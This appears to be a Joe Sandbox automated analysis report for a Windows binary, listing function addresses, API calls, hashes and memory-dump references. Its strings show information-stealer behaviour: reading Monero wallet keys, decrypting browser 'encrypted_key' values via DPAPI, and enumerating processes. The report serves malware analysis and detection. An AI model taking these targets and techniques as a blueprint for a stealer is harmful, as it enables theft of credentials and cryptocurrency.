                  • Instruction ID: 7da1bb342aab5636389389715a208ee407cca665eaa2bac75568a0d1d131cee9
                  • Opcode Fuzzy Hash: 8742170988ce6e5af36a1b740b5d1167a4f4b01aa927bc050e2f8a740e060c0b
                  • Instruction Fuzzy Hash: BDE08670A40208FBC700DB94DC49E597BB8EB04701F0041A4FD098B281D971AE208B56
                  Function 002AA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002B8B60: GetSystemTime.KERNEL32(002C0E1A,00D5EC80,002C05AE,?,?,002A13F9,?,0000001A,002C0E1A,00000000,?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002B8B86
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002AA2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 002AA3FF
                  • lstrlen.KERNEL32(00000000), ref: 002AA6BC
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 002AA743
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: ac5aa662b07a2aeeab6a7c635d33cabb8bc4df859f22c87b80a3a0dc2b656487
                  • Instruction ID: 69dd26aaa84107145a097d8110b1492757a244f777f055a7b4614de9e0929244
                  • Opcode Fuzzy Hash: ac5aa662b07a2aeeab6a7c635d33cabb8bc4df859f22c87b80a3a0dc2b656487
                  • Instruction Fuzzy Hash: 21E1D072820118ABDB15FBA4DC92EEE7338AF14340F508169F51776492EF306A69CF76
                  Function 002AD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002B8B60: GetSystemTime.KERNEL32(002C0E1A,00D5EC80,002C05AE,?,?,002A13F9,?,0000001A,002C0E1A,00000000,?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002B8B86
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002AD481
                  • lstrlen.KERNEL32(00000000), ref: 002AD698
                  • lstrlen.KERNEL32(00000000), ref: 002AD6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 002AD72B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: fc47b715b20d632dec514af5ae77404dbc9f49f43d158601a6abceb705f94416
                  • Instruction ID: 0f36c8e0868855550027f7ea47447a6c04599412e266b41b95c384573d37eeb4
                  • Opcode Fuzzy Hash: fc47b715b20d632dec514af5ae77404dbc9f49f43d158601a6abceb705f94416
                  • Instruction Fuzzy Hash: E1911571820108ABDB14FBA4DCA6EEE733CAF14340F504268F51776492EF346A29CF66
                  Function 002AD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002B8B60: GetSystemTime.KERNEL32(002C0E1A,00D5EC80,002C05AE,?,?,002A13F9,?,0000001A,002C0E1A,00000000,?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002B8B86
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002AD801
                  • lstrlen.KERNEL32(00000000), ref: 002AD99F
                  • lstrlen.KERNEL32(00000000), ref: 002AD9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 002ADA32
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 573db38799f0c3c12f281f00471d22a1d45a4295bcc9de84e3e444ceb9804c39
                  • Instruction ID: 39eca7b0010a3264f7e21279c07a386cf7eb9a71ab59297571014e333bc5d19a
                  • Opcode Fuzzy Hash: 573db38799f0c3c12f281f00471d22a1d45a4295bcc9de84e3e444ceb9804c39
                  • Instruction Fuzzy Hash: 9B812471930108ABDB14FBA4DCA6EEE7338AF14340F504128F557B6492EF346A29DF62
                  Function 002AF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002A99EC
                    • Part of subcall function 002A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 002A9A11
                    • Part of subcall function 002A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 002A9A31
                    • Part of subcall function 002A99C0: ReadFile.KERNEL32(000000FF,?,00000000,002A148F,00000000), ref: 002A9A5A
                    • Part of subcall function 002A99C0: LocalFree.KERNEL32(002A148F), ref: 002A9A90
                    • Part of subcall function 002A99C0: CloseHandle.KERNEL32(000000FF), ref: 002A9A9A
                    • Part of subcall function 002B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 002B8E52
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,002C1580,002C0D92), ref: 002AF54C
                  • lstrlen.KERNEL32(00000000), ref: 002AF56B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                  • String ID: ^userContextId=4294967295$moz-extension+++
                  • API String ID: 998311485-3310892237
                  • Opcode ID: 3ae1fd1843756246206daa3ebd13b0d82dd2dc2c8c3c56953acce09a8f12bf88
                  • Instruction ID: f44f3ed2cb4cb234e7a9ed5641daecbf7f12860e9cf5c7553e60cd51f599352e
                  • Opcode Fuzzy Hash: 3ae1fd1843756246206daa3ebd13b0d82dd2dc2c8c3c56953acce09a8f12bf88
                  • Instruction Fuzzy Hash: C951FF71D20108BBDB14FBA4DC96DED7378AF54340F408628F817A7591EE346A29CFA2
                  Function 002B70D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                  Download Yara Rule
                  Strings
                  • s+, xrefs: 002B7111
                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 002B718C
                  • s+, xrefs: 002B72AE, 002B7179, 002B717C
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy
                  • String ID: s+$s+$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                  • API String ID: 3722407311-4043291952
                  • Opcode ID: 5dd45e8eec50772a3447317701771c80aeea1a5d820f185b4578a54e4431a040
                  • Instruction ID: dd6b618c17a653f71e23f392279c9f4293ece22b2274daff21d59b4e6f9dc44b
                  • Opcode Fuzzy Hash: 5dd45e8eec50772a3447317701771c80aeea1a5d820f185b4578a54e4431a040
                  • Instruction Fuzzy Hash: 4B517CB0D24219ABDB24EFA4DC85BEEB374AF44344F1041A8E61977181EF746E98CF64
                  Function 002B3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: df5adfc8cb2caa78d6e0e9bea24ec06df1c5bc2147e520d75ff2ed58f92f11e0
                  • Instruction ID: 207bd60b3ec0f3e72faa17b7a9c408e81d6f2ae94e8938f7838276b034928bde
                  • Opcode Fuzzy Hash: df5adfc8cb2caa78d6e0e9bea24ec06df1c5bc2147e520d75ff2ed58f92f11e0
                  • Instruction Fuzzy Hash: 414161B5D20109EBCB04EFE4D895EEEB778BF44344F008518E41676251DB74AA25CFA6
                  Function 002A9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002A99EC
                    • Part of subcall function 002A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 002A9A11
                    • Part of subcall function 002A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 002A9A31
                    • Part of subcall function 002A99C0: ReadFile.KERNEL32(000000FF,?,00000000,002A148F,00000000), ref: 002A9A5A
                    • Part of subcall function 002A99C0: LocalFree.KERNEL32(002A148F), ref: 002A9A90
                    • Part of subcall function 002A99C0: CloseHandle.KERNEL32(000000FF), ref: 002A9A9A
                    • Part of subcall function 002B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 002B8E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 002A9D39
                    • Part of subcall function 002A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N*,00000000,00000000), ref: 002A9AEF
                    • Part of subcall function 002A9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,002A4EEE,00000000,?), ref: 002A9B01
                    • Part of subcall function 002A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N*,00000000,00000000), ref: 002A9B2A
                    • Part of subcall function 002A9AC0: LocalFree.KERNEL32(?,?,?,?,002A4EEE,00000000,?), ref: 002A9B3F
                    • Part of subcall function 002A9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 002A9B84
                    • Part of subcall function 002A9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 002A9BA3
                    • Part of subcall function 002A9B60: LocalFree.KERNEL32(?), ref: 002A9BD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: c4d533cf93f3a926d99b82668956bf237c7373d4b77337e12a732d6585bc3dbe
                  • Instruction ID: fafcb50264a9ae9929812c3680113f4e18ad1367d919d98cd5e3f62921862b33
                  • Opcode Fuzzy Hash: c4d533cf93f3a926d99b82668956bf237c7373d4b77337e12a732d6585bc3dbe
                  • Instruction Fuzzy Hash: 8A316575D20109ABCF04EFE5DC86EEFB7B8AF49304F144559E905A7241EB309A64CFA1
                  Function 002B8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,002C05B7), ref: 002B86CA
                  • Process32First.KERNEL32(?,00000128), ref: 002B86DE
                  • Process32Next.KERNEL32(?,00000128), ref: 002B86F3
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  • CloseHandle.KERNEL32(?), ref: 002B8761
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: a5046558fa0a1e7535e1d7739eefa5101bd30be99f0f8af51903427872bfd587
                  • Instruction ID: adff08fb53dc11a3d50278bc8168cc0ac3d32e9c7c4417bee8a1bb0bbe175978
                  • Opcode Fuzzy Hash: a5046558fa0a1e7535e1d7739eefa5101bd30be99f0f8af51903427872bfd587
                  • Instruction Fuzzy Hash: DB316B71921218ABCB24EF90CC91FEEB778FF45740F1042A9E10AA61A0DF306A55CFA1
                  Function 002B7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,002C0E00,00000000,?), ref: 002B79B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B79B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,002C0E00,00000000,?), ref: 002B79C4
                  • wsprintfA.USER32 ref: 002B79F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
